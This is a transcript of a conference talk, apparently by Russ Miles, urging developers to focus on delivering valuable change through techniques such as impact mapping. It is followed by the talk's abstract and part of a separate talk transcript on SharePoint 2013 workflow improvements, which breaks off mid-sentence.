development.
Anger in that I worked with a sociopath who had made me almost cry on several occasions because I hadn't figured out what was in his head. So I came to this big organization. I thought, well, that was a small org. Maybe that's how small orgs work. So I went to a big organization and the guy sat me down. The interviewer was extremely smug. Lovely guy as it turns out, but very smug. And the first thing he said to me in my impressionable state was, we know how to do software. And I thought, wow, great. Think about my career here. I'm going to be ahead of everyone else. I keep hearing about a software crisis. These guys have solved it. Brilliant. So I was there. I was ready. I thought, great, I'm in the right place. We know how to do software delivery. We spend on average nine months on every project. I thought, that's good. As far as I can remember, when I was working on stuff, it was panic driven and that was it. We didn't deliver anything, but we still panicked all the time. So nine months sounds fairly orderly. So I'm feeling all right still. And then he dropped the bombshell. We spend eight months modeling, writing diagrams, beta testing a brand new tool for the industry, it's going to revolutionize the world. This is called Rational Rose. And you are going to use this tool and you are, seriously, eight months of this work. And then the last month, and I swear, he gave exactly this physical motion. He said, for the last month, we crank the handle and there the code is, done. Like the monkey on the organ, out drops the monkey poo. There's your software, done. I didn't know that at the time. I was just thinking, wow, that's brilliant. And then every project we do is on time and to budget. Job done. I'm in. All I've got to do is work with these people and my career is finished. Brilliant. Okay. So I stayed with that company for eight years. I swear, I never saw a project finished on time and to budget. I never saw any software actually delivered that ended up in operational use. So I learned a lot about how not to do software. And during that time, there were several shifts, groundswells. This was the first one. This was this idea of forward engineering. Who did forward engineering? Who was part of companies that did forward engineering? As I get older, the audience gets younger, and fewer hands go up. Okay. Yeah, there's a few. Forward engineering. Wasn't that a great idea? We're going to do models. We're going to think a lot about this software, although the thinking got downplayed a touch. We're going to do a lot of models. We're going to review a lot, and then we're going to drop out a steaming pile of code. Then they said, well, that maybe doesn't work. Okay. Maybe the code is a little bit more important than that. Maybe we'll do reverse engineering. Maybe we'll start with the code, and then out comes your model. Which means, ironically, the code looks all right, then the model looks like a steaming pile of monkey poo. So the final gambit was this whole idea of round-trip engineering, which felt sort of desperate to me. It was kind of, well, forward didn't work. Reverse isn't working particularly well. Maybe we'll just go around in circles. So we have round-trip engineering, which I think there's a good analogy out there for how it felt, which was driving swiftly towards a cliff, sticking it in reverse, sticking it forward, and trying not to go off the cliff. So it wasn't a huge step forward. It certainly didn't deliver on the promises that it had made.
At that point, in other parts of the industry, bear in mind I was still doing forward and reverse and waiting for the one project that would finish in nine months. The rest of the industry was starting to be sensible. There were some very smart people, again, I'm rubbish for names, very smart people that had got together and decided that this was madness, and that there were better ways of building software. And regardless of the techniques that each individual brought to the table, they couldn't really agree on those. It was much easier, eventually, to agree on the principles that underlie things. And they came up, obviously, with the Agile Manifesto. So we're all familiar with that, I'm sure. And there were these techniques, and these started to eke their way into my delivery life. I started to move out of the organization I was in and into other more fruitful endeavors. And these were the sorts of techniques that were beginning to play in. And I felt that these techniques and these frameworks for a process were quite useful, but I didn't like the whole culture of, thou shalt this. There was too much doctrine. There was too much, do it this way, otherwise you're not doing it. You're not doing Agile if you're not doing that. And so I spent a lot of my time thinking this was irrational and picking up pieces of these different techniques and tools and building processes with teams that started to help them deliver. Because I'd been so scarred by eight years of not delivering, the only thing I wanted to see was what delivery looked like. I was desperate. So I started to pick and choose from these things as a desperate man would and use them to help teams deliver, and the teams I was in. And I kept augmenting my toolbox. TDD became an important part of my life. I now pretty much write the majority of my code that way, although I'm sure if anyone's been to Dan's talk earlier, you'll see there are times when TDD isn't necessarily the right tool to pick up. Nothing is the magic screwdriver. But TDD was very useful. Dan then rebranded it just when everyone was getting used to it. Is Dan here? Dan said he might pop along. He's spiting me because I didn't go to his earlier. So BDD, we can talk about Dan since he's not here. BDD, which was essentially Dan saying, we do TDD a little bit oddly, maybe if we rebrand it and reframe it a touch, we can do it well. And I think he was right. And then more recently, specification by example appeared. And anyone using specification by example at all? Yeah? Pretty useful technique. It has its pluses and minuses. Not easy to apply. Simple technique, not easy to apply. That seems to be a common theme in our industry. Specification by example, which essentially gave us a set of rules to create minimal specifications for our software. And all of these tools were helping us to deliver valuable software, which is good. That was the problem as it was framed. That was the goal. Everything extended out. Another very smart group of people, whose names I cannot remember many of, got together and talked about craftsmanship, putting the code front and center, which was very different from how I'd been with this whole idea of UML and forward and reversing and that sort of game. Code became the important player that it should be in our lives when we write software. And there were all sorts of approaches, principles, patterns that could be applied to these things. And we're still developing these patterns today.
The one I like to pull out is design patterns. Does anyone remember their first experience with design patterns? That first day, when you've just done the design patterns course or you've just read Head First Design Patterns or you've just done something with design patterns. And you come in to write your next piece of code. Do you remember what that next piece of code looked like? Do you remember how many patterns you applied in it? I think most of them in mine, because that seems to be a common pattern I see everywhere, ironically. It's a pattern for patterns. The first day back from a patterns course, the first piece of software written, tends to exhibit every pattern in the catalog for something like Hello World. So over-usage of these things, I think we can say this for all of these techniques. Over-reliance on any of these techniques ended up being that rubbish piece of code that had patterns applied to everything. So we experimented, at least I did, experimented with all these techniques over the course of about ten years, trying each avenue, seeing which ones worked for different teams. All with the end goal in place of delivering valuable software frequently. And I saw a general trend as well towards simpler approaches. Kanban is somewhat simpler than the structured approaches of Scrum. So I saw a lot of teams moving from one to the other, and then a bit back again. There was a lot of gradual change in the industry, in my clients, as they adopted simpler and simpler techniques. So that was a trend in the industry I saw as well. And the way I helped to guide what techniques I concentrated on learning was, which is the simplest one, which makes my life simpler, getting towards this goal of delivering valuable software frequently. And then in retrospect, it became a bit of an epiphany. If we look back, and I don't know if your experience has been the same as mine, if you look back over the last ten years, you will have explored a lot of different options. You will have tried perhaps Scrum, perhaps you're still trying it. You maybe have tried software Kanban approaches. You may have tried a little bit of XP, you'll have tried a little bit of TDD. You'll mix this all together, and maybe you're delivering stuff now. So that's actually really good. What we've done is we've explored the options of a roadmap. If someone had said to you ten years ago, can you deliver software frequently? And I want you to pick the one set of tools and approaches to make sure that happens. You'd probably have struggled. At least I know I did. At the time, my answer would have been forward engineering and Rational Rose. That guy told me it works. But essentially what we've done is we've explored and experimented with these techniques. And we've now come, I believe, reasonably reliably, to delivering valuable software frequently. Problem solved then. Aren't we done? Well, given the context of my initial story, around we can have all these things working and still not be doing the right thing, I would put to you that I don't think we're done. What we've done, if we look back, is going from then to now, we've gone from deliver never, or deliver nothing, or maybe deliver something eventually possibly, to deliver something. And if you're getting it really right, you're starting to deliver valuable software, which was one of the principles. And this is better. I think it is better. But it has been unfortunately oversimplified. We've optimized the engine.
We have made sure that our engine as software developers is gleaming. We're applying practices so that we can continuously deliver, we can make sure that we're writing the great software, we can collaborate more. These are all good things, don't get me wrong. But it's an oversimplification. Because of our goal. Why we do what we do is an oversimplification, in my opinion. Deliver valuable software is less important if we need to broaden it from delivering valuable software to deliver valuable change. I will go back to my contextual story to explain why in a bit. But this is the big takeaway from this talk, I would like you to think a little bit, and don't feel too dirty by this, as a change agent. You are an agent of change. I'm sorry, you are. You deliver things. And those things have an impact on the world. Every time you write a piece of code, you have impact on your team. It's true. You have an impact on time scales and everything else that's going on. But ultimately you also have an impact on the world around you. And if we forget that, we end up with a turbocharged, gleaming, wonderful engine that is firing on all cylinders in the wrong direction. Okay, so what does this mean to where we may go as software developers in the future? If you accept my proposition that we should think a little bit more about the change, the impact that our software has. Well, there are a number of techniques appearing in the industry for just this issue. Only two weeks ago I had a meeting with a lot of great people in New York, again, names rubbish. Some wonderful people in New York who were discussing why, are we done yet? Is software done yet? And the conclusion is, no, it's not. Because we do deliver valuable software, but sometimes software is the problem. Because people don't buy software. Not really. I know that's going to be a bit of a strange thing for anyone from Microsoft. You guys basically invented buying software. But people don't really want the software. What they want to do is do something. They want the impact. They want to change their lives. Right now, situation now is not great. I need to do something. Situation then, I kind of want to be different so I can do something. I don't want to buy Microsoft Word. That's not really why I'm interested in. I just want to write the freaking document that I've got to pass to some company that's still using Microsoft Word. So what they want is a change. The techniques that I'd like you to consider and start looking at, if you take this idea of broadening our role to be more interested in change, techniques such as real options. Anyone looking at real options at the moment when they're building their product roadmaps or anything like that? Okay, look at it. Impact mapping. I have a small confession to make again. Impact mapping is a technique for building a road map, not a road. Anyone here involved in building product roadmaps? Not always the case at a Dev conference. That's fine. Product roadmaps, the ones I experience, tend to look a bit like this. We start here today, then we do this thing and that has this benefit, hopefully. Then we do this other thing and then we're done. We spent this much money and that's our product road map. That's not a road map. That's a road. Worse, it's probably a tunnel. You go in one end and you've got to get out the other end. There's no exploration of the challenge. There's no exploration of the problem space between the two points. What impact mapping tries to do is ask you what impact should the software make? 
What change do you want to enable? Then explore the options of how you get there. Sometimes it will be write a three-tier system with actors and Scala, possibly. Sometimes it might be build a new iPhone app. But unless you explore the possibilities to enable that goal, you could be missing a huge trick. These techniques, you hope, are being used by the product owners or the stakeholders. Truthfully, I haven't encountered them being used very often. They're just on the cusp of being introduced. As developers, we can use these same techniques. When I'm trying to make a change in my software and I've got plenty of options of how I can do it, I pick the simplest option. How do I know it's the simplest option? I use impact mapping to help me brainstorm the options about what I could do. Then I pick something to try to get to my goal. Even at the level of software development, design, and architecture decisions, impact mapping has a place. It's just a thinking tool, but it has a role to play. In the broader scheme of things, it helps you understand that if you have a goal to meet, there are lots of ways of getting there. I did an impact mapping workshop at QCon this year. One of the goals that had been set, so you generally come up with a goal first, why are we doing anything at all? That's your first question. Why do anything? If the situation now is okay, why do anything at all? Let's go do something else valuable. Assuming that there's something wrong with situation now, the goal could have been set, as an example, as we need to reduce the costs of the call centre. As developers, the first thing we think about is how to solve that problem. What software could help the problem? What are we going to build? Do you know what, there's a sneaky nastiness to this as well. We don't just think about what we're going to build. We start to think about what could we build it in, because it will be fun. There's a lovely piece of research into why developers produce complex solutions. Why do you think that is? Anyone want to shout out why we build complex solutions? It's fun. Talent. It's fun. Actually, that's really close. There's actually a negative end on it, which is your business problem is boring. Writing code is more fun and we want to write code. We're so bored by doing your transformation of your data again, we'd rather pick a complex solution and do it. We're not consciously doing it. It's actually a desire internally. It's something that some of us should be aware of. Given this idea of a call centre, the simplest answer, well, what is it? Anyone want to suggest what the simplest answer might be? Close it down. Get rid of it. That's not a call centre anymore. Job done. What you get, of course, is the business stakeholder going, we can't do that because then we'll lose all these clients. They'll get annoyed and go away. You've oversimplified your goal then, because your goal was as simple as reduce the costs. That's easy. We can do that. I'll give you one other example that Gojko gives, which is a lovely example. Gojko Adzic is the gentleman who brought together a number of techniques into impact mapping. He gives the example of going to see a head of IT, who he asks, why am I here? Gojko says, why am I here? What do you need to do? What's the change? What's the impact you'd like me to make? This particular gentleman turns around and says, I've currently got a £40 million budget for my IT department. I would really love you to come in and increase it to an £80 million budget. We can do that. We can do that easily.
Let's go buy a couple of super yachts and go have some fun on the med. Seriously, this was a conversation as it went, was you just want to spend more money? Brilliant. That's easy. Let's go have a beer. Of course, it was an oversimplified goal. That's the gnarly truth of goals. If you oversimplify them, you get what you're looking for. It's all well and good having an impact map of how to get there, but you have to assess every part of the impact map to make sure that the goal is valid. My posit to you is that the real goal should be to deliver valuable change. I wrote an article for the developer magazine that they're giving away at the conference, which is titled, Stop Wasting Your Life. I would like you to consider the impact your software has. If you don't know what it is, ask. Find out. It has an impact. Somewhere it must have an impact. Even if the impact is just business longevity, it's an impact. Find out your impact. As developers, we should be aware of the impact we make, because that will make us more responsible people about what impact we're making on the world. That's a really huge deal to know the impact you're making, because then you can start to make different decisions. At this point, I usually start to lose the audience just a touch, because if you're a developer in a team, you'll be starting to think, if I turn round to someone and say, you don't need any software, you could just do it a different way, I've lost my job. It's not true. What happens in my experience is that when someone turns around and says, actually, you don't need software to solve this, you could do something else, they very quickly jump to, what else can we do? We still got the budget. We still got the team. What else can we do? Can we deliver something else that's even more valuable? Do we have a different goal that we can achieve? There's always a bigger fish to fry. So don't be frightened of saying that that one is simple and easy. We can achieve that now and get you the goal you want, because it's not oversimplified, we can just achieve it. And maybe we'll do software for something else that's more complex. So back to my confession, my story originally, great team, great practices, great processes, minimal processes, well understood problem space. Hopefully now it's becoming obvious. What the issue was is I discovered that they didn't need to build any software. If they had constructed an impact map, as I did in the first 10 minutes of arriving and seeing the user's work, they would have realized that the options for solving that process problem could have been far simpler than build some software. Building software is the hard thing. Okay? It was going to cost two years worth of 20 people, me included, it was going to be massive. It's going to be fun, don't get me wrong. But by exploring it in an impact map, I found that really they didn't need to do any of that. The whole process could be solved by a wall and some sticky notes. Because what was happening is people were repeating this calculation from these multiple sources over and over again because they were not sharing the answers. These answers didn't change very often. So by simply putting these things on a wall, if you've got to use technology, stick them on a screen somewhere. They could have overcome the process problem and dramatically reduced their costs and got those people doing something more valuable. What do you think happened next when I spoke to the stakeholder and told them this? Anyone shout it out? 
What do you think their reaction was? Disbelief. Disbelief? Yes? At first, disbelief. But I had an impact map and I could show them very visually that if you do these things, you get most of the benefit you're looking for. Tragically, they still did the project and they're still doing it now. They still built that software. They still spent millions on something that a few sticky notes would have almost achieved, almost in its entirety. So, not to end on too much of a downer, but by exploring the problem and thinking like someone who's going to try to make a change rather than just deliver software, I could at least inform the client or your business or your teams on how to achieve an impact differently, perhaps with less effort, perhaps more simply. Because we need to beat this guy. Now that we've got our engine working well as developers, and this usually happens at these sorts of conferences, you get the best developers at a conference. I often say the only difference between me and you is someone's got to stand up here. So you are probably, I would suggest, in teams that are already delivering and feel good about what you're delivering. I'm asking you to come out of your comfort zone just a touch further to help beat this guy. You may not even know you're doing this, but if you find that the business isn't really getting the tangible benefits, the impact from what you're doing, then that's something I think you should be aware of. And then you can start to influence what you build, what impact you make. Okay, quick summary, if I may. I'm suggesting it's all fine and dandy to be a software developer, but I would really rather you think like a change developer. In order to think like a change developer, you've got to make one small change. What impact is happening because of what you're doing? Some businesses won't like you asking. I've had awkward conversations where developers have said, why are we doing what we're doing? And someone said, well, you've just got to do it, you're the developers. That silo of knowledge is worth gradually wearing down because, as developers, you will make better decisions if you understand the impact that's trying to be made. Move from delivering valuable software to delivering valuable change, thinking that way. Software is just one option. Use techniques like impact mapping to explore the potential options to achieve something valuable, some valuable change. And experiment, right? When you're trying to get to the goal of a valuable change, don't take the first route to it and go, that looks good, because down that road, more than likely, if you're like me, like most developers, software lies. I want you to explore what else could be done. Impact mapping is just one tool for that. Five Whys is another. But when you come across these areas, some people ask, how would you navigate? So how do I start off on my impact map, where I do something and I move to the next level, I'm moving towards this goal, and how do I choose a route through? You experiment. Truthfully, you look at what next transition you can make with the smallest amount of effort. You look for measurements of success towards your end goal. Okay? This is all part of impact mapping. And personally, for me, the ultimate answer for which route should I take is, what is the simplest answer? What can get me towards the end goal in the simplest way? Not the easiest. Okay? Be very careful about this. It's not that the next jump is tremendously easy. It is the simplest option.
It leaves more options open to me than the other options that are there. I often get asked for a definition of simplicity at this point. For me, simplicity is the removal of entanglement to the point where no value is lost. Okay? It's reduce, reduce, reduce. For reducing me further, I'm going to lose something important. Over simplification is everything else on the scale. The point at which you've lost something valuable. Again, coming back to that example of if the goal was to reduce call centre cost, that's a very simplified goal. If shutting it, which is a perfectly valid mechanism of doing that, is a good answer and everyone's fine, doesn't sacrifice value, then we're fine. Chances are that's an oversimplified goal. And make the right impact. I want you to always ask one question if you don't mind. What if no software is needed at all? If software isn't needed at all. Okay? What if you didn't need any software? Because software is one of the hardest things to build and get right. And our jobs could include not using software. It used to. Back in the day, I'm old enough to remember being given problems, not given solutions. Okay? These days, we seem to be married to the idea that we are going to be told to build some software, and therefore we build some software. But I can remember back in the day when you're collaborating with the businesses, where they said, look, I've just got a problem, please help. Which was actually a better position to be in, because then I could explore the options. And it's great if no software is needed. Because you're still contributing, you're still doing something valuable. Okay? Thank you very much for your time this afternoon. Thank you for coming to the talk. And I hope you have an excellent conference. And I hope to see you around at some point. Grab me if you see me looking. Wandering around looking lost. Okay, thank you very much.
|
In this talk, Russ Miles (principal consultant at Simplicity Itself) will share the patterns and anti-patterns he's observed when teams attempt to really deliver valuable software. Taking an irreverent view of the goals, architectures, technologies and processes that have become part of our everyday lives, Russ in typical polemical style aims to impart real principles and practices that guide him when helping teams deliver, especially when sometimes they've forgotten how to do that at all! Russ aims to help you never look at what you do for a living the same way again and start delivering valuable software frequently and speedily now.
|
10.5446/51502 (DOI)
|
Okay, let's roll. So, this talk is about workflows in SharePoint 2013. I assume all of you are somewhat familiar with SharePoint. SharePoint 2010 at least, and you've tried and used SharePoint in general, and especially the workflows part of SharePoint 2010. And this talk takes from that knowledge base and basically talks about what are the new enhancements in workflows in SharePoint 2013, and how we can benefit from them. I think if you've attended any of my previous talks, I've been to Norway various times, and I've never been a proponent of workflows. Workflows in SharePoint 2010 and 2007. I've done various trainings over here, and in every training I've basically said, avoid it. Avoid SharePoint 2007 workflows, avoid SharePoint 2010 workflows. It's not that they're bad as such, the vision is very good, but the biggest problem was performance and scalability, and developing them wasn't a lot of fun either. So has the situation changed in SharePoint 2013? Well, let's find out. So a little bit about me. My name is Sahil Malik. I live in Washington, D.C., but I travel quite a bit. And I'm a trainer and a consultant. My areas of interest are SharePoint, SQL Server, .NET, and iOS. iOS is basically like Objective-C programming and all. I feel it's time we should all look into diversifying our skills, and that's one of the things that I've been doing. And I work mostly in America and Europe. I live in America, but I'm in Europe quite a bit. And my next trainings here in Norway are with ProgramUtvikling in Fornebu, and the next training is on September 2nd on WCF 4.5. After that, it's September 9th, SharePoint 2013 and Office 365, end-to-end 5-day training. And then the next one after that is in London on November 25th on WCF 4.5. So let's talk a bit about, you know, what is the value of workflow, right? We are techies, and you know, when Microsoft releases this new Surface tablet, we get pretty excited and some of us go and buy it, right? Why do we buy it? Of course, we love technology. That's part of it. But the other, you know, thought behind this is that it's an investment in our career. We want to learn what is new, right? We want to write WinRT apps, and we don't want to work with an emulator. We want a real device to try things out, right? And, you know, the Surface tablet is $499 or $599. They're selling it for $99 at TechEd, I heard. And it's an investment. And if it breaks, you know, you can return it and get a new one. It's a very predictable investment. But still, we think for a long time before we make that purchase. Now, think of it from a company's perspective. A company wants to start a project because they want some automation done using software. And the rules are in the business users' heads, and basically they hire a team. A team of developers, a project manager, and so on and so forth. And, you know, when you hire a developer, in the first one hour or even 30 minutes, he costs more than the Surface tablet cost you, right? And then it's not really until, you know, a month later that you know if he or she is any good, right? And also the failure rate of projects is quite high, right? So, you know, most projects, many projects, go over the timelines, etc. My point is it's a huge investment for a company to hire developers and write software.
And this proposition of a business user being able to craft the, you know, the flow of what they're trying to accomplish in a tool like Visio, something that they're already very familiar with, and have it running without involving a developer, that is very, very compelling. And that is the challenge that, you know, workflow tries to solve. So, a brief history on workflows in the Microsoft platform. You know, workflows in SharePoint have always been three stories: out-of-the-box workflows, some that come right out of SharePoint; SharePoint Designer-based workflows that you can craft on your own; and Visual Studio-based workflows where you want to, you know, add some logic that Microsoft didn't think of. So, 2007 is when, you know, SharePoint and workflow were introduced to us. Workflow Foundation was a part of .NET 3.0. And SharePoint 2007 was the first engine, or client, that implemented the Workflow Foundation introduced in .NET 3.0 inside of SharePoint. So, whenever you run a workflow in SharePoint, workflow as in 2007 and 2010, that workflow is basically a class, and the class gets instantiated, and it runs inside of a process called owstimer.exe. And the way this works is that if you've created, let's say, an approval workflow, and there are 15, 20 instances of approval workflow running on your farm, there is one instance of that class created in owstimer.exe. And as you go from, you know, activity to activity, it doesn't matter how many users you have, doesn't matter how many instances of the workflow you have running, you are multiplexing one instance of that class. So, what happens is that the entire state of the workflow has to be read out of the database, hydrated into that class, and then that activity runs, and then the whole thing gets dehydrated back into the database. So, essentially workflows are single threaded, but the bigger problem over here is that, you know, the workflows, they have to pay a big penalty for the serialization, deserialization cost. And in SharePoint, the database you're saving to is the content database, which is not the best performing database, it's not like finely tuned for performance, let's call it that. And also the objects that you're hydrating and dehydrating are very, very heavy. As a result, workflows in SharePoint 2007 suffered from performance and scalability concerns, right? So there are various limits, like, you know, you can only have 100 events running at a time. You can only have 15 workflows per web front end in a farm, right? Just 15, right? And these limits are obviously tweakable, but even at 15, even with the out-of-the-box workflows like approval, etc., which is literally just like a one-step workflow, it would really, really hammer your SQL Server. So performance was a big problem. Also, in SharePoint 2007, you had another, you know, situation where you had some of these out-of-the-box workflows, and, you know, using them was very, very quick. But if your boss came up and said, hey, I want to change this text at the top, you're like, well, this is going to take me four months, right? And basically, those out-of-the-box workflows were not customizable. They were what they were, you know, complete black box. So the editing experience or the ability to create new workflows was basically restricted to two tools, SharePoint Designer and Visual Studio. The problem with SharePoint Designer-based workflows in SharePoint 2007 was that you had to develop directly on production, right?
It hard-coded all the GUIDs, it hard-tied your workflow to a particular list, right? And those workflows, you know, you could not move them from one environment to another. So when you moved from QA to production, the story was, you know, have the same guy who built the workflow in QA and have him repeat those steps carefully in production. That wasn't a very good story. You couldn't, like, export the workflow to a WSP and so on and so forth. And Visual Studio-based workflows, you know, the developing experience was fine. It wasn't the easiest. It wasn't the most intuitive. But let me just say this, that if you're editing UI, if InfoPath was your best story between InfoPath and ASPX, then we had a problem, right? InfoPath was not the easiest thing to manage, especially when it comes to deploying across environments. So obviously workflows in SharePoint 2007, you know, had issues. But I would say Microsoft had a vision and they continued to push in that vision. So in SharePoint 2010, they introduced some changes. But one thing that could not change is workflows, even in SharePoint 2010, were .NET 3.5 SP1, which is still CLR 2.0, so they still suffered from the same performance and scalability concerns. But they introduced some very welcome changes, mostly in SharePoint Designer, some in Visual Studio, and a little bit in the API. So out-of-the-box workflows could now be edited and modified. You can open them in SharePoint Designer, edit them as you wish, save a copy, etc. So that was a big plus. SharePoint Designer workflows now became portable, right? You could export a workflow and move it into another environment, or even import that into Visual Studio. Practically speaking, importing that into Visual Studio was not a very good alternative. I'll get to that in a second. And they introduced this capacity of being able to create Visio visualizations. So you could take basically a Visio diagram, export it. You had to use a special stencil to create it. It was called as a SharePoint 2010 workflow stencil. Export that as a VWI file, Visio workflow interchange, and then import that inside of SharePoint Designer. Or you could go the other way. So you could import that from SharePoint Designer to Visio. The end result was that an end user is crafting up a workflow visually, like drawing a diagram, and the workflow is... The user sees that diagram running inside of a page. They see that I'm on this block and the previous block, this was the output, and this is the user that approved it. So using Visio Services, they were able to render it. And they improved the Visual Studio experience, as in that the ASPX forms are actually pretty good now, and they introduced the concept of site workflows. So they made some improvements, but there was still one big problem. That workflows still did not scale. So the question is, what have they improved in SharePoint 2013? I would say before 2013, those workflows are so bad, I call them work slows. So I would say in 2013, the general story is still the same. You can go between Visio and SharePoint Designer as much as you wish, and SharePoint Designer can export a WSP, Visual Studio can export a WSP, and you can do a one-way import from SharePoint Designer into Visual Studio. So the general story is still the same, but they've added a couple of things. Number one, the import-export story: VWI still works, but you don't need to do VWI anymore. You save it as a VSDX file, which is the XML version of the regular VSD file.
So you use Visio 2013 and you save a VSDX file, and you can import that VSDX file directly inside of SharePoint Designer. So the advantage over here is that if somebody crafts a workflow, and they did not use the standard activities that you're used to in a SharePoint stencil, it could still be imported in SharePoint Designer. So usually when somebody is crafting up this workflow, what they found is that every now and then, most of the activities or the blocks they threw on the diagram were correct, but every now and then they decided to put a pretty picture for a server and you couldn't import anything. So now you can import it, obviously you can't turn it into a workflow, but inside of SharePoint Designer you can make these minor fixes. The other big thing they've introduced is that you don't even need to go between these tools anymore. Now, you still can. If somebody prefers to use Visio and only Visio and no SharePoint Designer, you can still do that. That's not a problem. But when you are inside SharePoint Designer, you can expose that Visio surface right inside of SharePoint Designer and basically be able to craft up that visualization right inside of SharePoint Designer. I'll show that in a demo pretty soon. And then obviously exporting to Visual Studio, etc. But one thing that they've introduced is now workflows can run as an app and they can run as a Sandbox solution. By the way, if somebody tells you that Sandbox solutions are deprecated or WSP's are history and you don't need to worry about them anymore, that's not true. WSP's are still very much with us and it is still required for a lot of key scenarios. In fact, when you deploy a SharePoint hosted app, a SharePoint hosted app internally builds itself using a WSP. So WSP's are not history, right? So don't forget all that knowledge that you've learned about WSP's. So I have a little quiz for you. Can anybody guess what is this picture? Looks like a pretty complicated picture. I've heard also this looks like a machine part. I've heard all sorts of answers to this. This is the out of the box approval workflow one step and I added a log to history activity at the end in SharePoint Designer and I exported that as a WSP and I imported that inside a Visual Studio. And this is what Visual Studio creates after about 30 minutes of machine getting frozen. So in this little dot that you see at the very bottom, that is the log to history activity. So the rest of it is the approval workflow. So even the out of the box approval workflow, which is probably one of the simplest workflows they have, that workflow, when you export from SharePoint Designer and import inside of Visual Studio, you can see that it's not very practical. You can't really maintain it. So basically what I'm trying to get to is that this picture right here is practically unusable. You're going to make some minor tweaks here and there, but it's not something that you can use for development. So one way export anyway, but the end result produced like this is not usable. So workflows in SharePoint 2013, let's continue diving deeper into that. Everything before this, so the work slows that we used to have before this, 2007 and 2010, now they call them SharePoint 2010 style workflows, right? And that's basically a dead end, as in all the investments that you've done in SharePoint 2010 style workflows, which is workflows in SharePoint 2010 and before, they will run in SharePoint 2013, but they run as what we call as SharePoint 2010 style workflows. No improvements there. 
They'll still continue to not perform well. They'll still continue to have all the problems that we had with them in the past, right? And they are available in SharePoint Foundation and all SKUs of SharePoint, but if you have SharePoint Enterprise, you know, SharePoint 2013 is SharePoint Server, and then you buy CALs, so if you enable the Enterprise CAL, then you can use what they call as SharePoint 2013 style workflows, right? Now these SharePoint 2013 style workflows and 2010 style workflows are completely different from each other, right? They're very different from each other. So what are SharePoint 2013 style workflows? They run in a completely separate product called as Workflow Manager. Workflow Manager is not a part of SharePoint. It is developed by a completely separate team. And SharePoint is one of the first clients that uses Workflow Manager. Could you write your own application in .NET that uses Workflow Manager? Absolutely. You can write these workflows in XAML. They don't use XOML anymore. So in fact, what you can do is you can craft up a workflow, and because SharePoint 2013 uses PowerShell 3.0, PowerShell can now instantiate these workflows very, very easily, right? And they don't even have to be SharePoint workflows. They can be any sort of workflow. And you can leverage them via SharePoint workflows, or you can leverage them via PowerShell or any other platform you wish. So they run in a completely separate product, right? And that separate product is a server, a Workflow Manager. That integrates inside of SharePoint using a couple of PowerShell scripts you have to run. So inside of Office 365, this is already set up for us, and they're using OAuth 2.0 over there. And on-premises, they use a different protocol called S2S Trust, which some people call as one-legged OAuth, right? So it's like a diet version of OAuth. S2S Trust is not a standard, but it is something that we're hoping will become a standard. But on-premises, you would register this server using S2S Trust. These workflows, because they run outside of SharePoint, they can actually scale and perform quite well. And even out of the box, even on a one-server environment, the performance is like hundreds of times better. Like, literally the same workflow runs hundreds of times better. Remember that you get 100 times better performance with the same convenience that you have in SharePoint Designer, like you can craft a workflow visually. In fact, they've made some improvements over there, too. So finally, they're sort of delivering on their promise here. And the users, however, will notice just one big difference, that you can no longer attach the SharePoint 2013-style workflows to a content type. If you're very used to attaching a workflow to a content type, SharePoint 2010-style workflows can still be attached to a content type, but 2013-style workflows attach basically to the item content type. Why did Microsoft do this? Because basically attaching a workflow to a content type is a very cumbersome operation behind the scenes. And especially when you update the workflow, they have to iterate through all the instances of the content type, all the inherited instances, and basically run a lot of code to fix that. So a better way to do that is basically you have the content type column available to you. You can just check it as a string, even the content type ID you have that available to you. And you can base your logic on that, right?
So they've basically, you know, you don't attach them to a content type anymore. SharePoint 2013, SharePoint Designer, what are the improvements they've made there? Number one, they've added the concept of loops, right? Doing loops in SharePoint 2010 was possible, but it was very cumbersome. There's some black-art knowledge that if you place your activities in a certain way, you get a loop. They've introduced the concept of stages, and they've finally given us the ability to do copy-paste of activities, right? Copy, paste, cut, redo, undo. These are basic operations that you could not do in SharePoint Designer 2010. As I mentioned, Visio is embedded inside of SharePoint Designer, and you no longer need the VWI format. You can work directly with the Visio format if you want, open that in SharePoint Designer directly. What are the improvements they've made in Visual Studio workflows? I think from a maintainability point of view, the one biggest improvement I see is that these workflows can now be deployed as apps and as sandbox solutions. One little point I'll make is that with the out-of-the-box templates, when you create a workflow, it adds the workflow and it adds the feature as a site-scoped feature. That's a bug in the current Visual Studio tools, even in Preview 2. What you have to do, for you to be able to see that workflow, is to change the scope of the feature to web, and then you'll see that feature. We'll see that in a second. One other big change that they've made is in the extensibility story: SharePoint Designer is not cutting it, I need Visual Studio to extend what workflow does, I'm going to write custom activities. There are two kinds of activities you can write, one that you should and one that you shouldn't. The ones that you should are the ones that can work in apps, they can work in sandbox solutions, and they'll work in Office 365. Those activities are completely declarative. You write them completely in XAML, and you'll see that writing that activity almost feels like you're working in SharePoint Designer. It's literally like drag, drop, set a bunch of properties, hit F5, and it works. Well, you have to do a little bit more than that, but it's almost that easy. You have to edit an XML file. The other kind of activity, that you shouldn't write, is basically pretty similar to what we used to do in SharePoint 2010, which is that basically we would have to register the DLL, and then we have to go find this .actions file, edit it in Notepad, because WSPs couldn't update that, and if you deployed a patch like a service pack or something, you had the danger of losing your activities, and you'd have to redo those changes. It's too much of a hassle. Even on-premises, I would argue that it's too much of a hassle, so I'd just say, stay away from writing those sorts of activities. Instead, just use the declarative activities and put your custom logic in web services. But the bad news. The bad news: SharePoint 2010 workflows continue to suck. There are no changes there, and there is no upgradeability story from SharePoint 2010 style workflows to SharePoint 2013 workflows.
There is no point-and-click upgrade process, and this applies even to all the third-party products that have invested heavily in Workflow Foundation, and so they're going to have to come up with their own solution. There are a lot of limits that apply to workflows. You'll get a copy of all these slides, so there's no need to read each one of these one by one. But as you can see, there are a lot of these that are sort of absurd, like the workflow postpone threshold, 15, that's 15 running concurrently; the workflow timer batch size, 100, it picks up 100 jobs at a time; workflow associations, not published, 100 per list. So there are a lot of these limitations that feel like they're pretty low, as in that you can't have a... It's not something that can support thousands of users on one web front end, for instance, which is not that much to ask for. The good news is most of these don't apply to SharePoint 2013 style workflows. SharePoint 2013 style workflows, there's just a couple of these in here. The maximum workflow definition size is 5MB. So if you've written 5MB of XAML, well, maybe there's a different problem there, but that's the maximum size you can go to. That applies to SharePoint 2013 style workflows. I'd say that is not such a big deal, and you can go up to 121 levels deep in nesting your workflow. Well, that's not such a problem. 121 levels is quite a lot. There is another limitation when the workflows want to talk to the on-premises Service Bus on Windows Server AppFabric: there's a timeout issue because it's basically a WCF service you're talking to, but that's like 120 seconds. Again, not that much of an issue. So the workflow limits for SharePoint 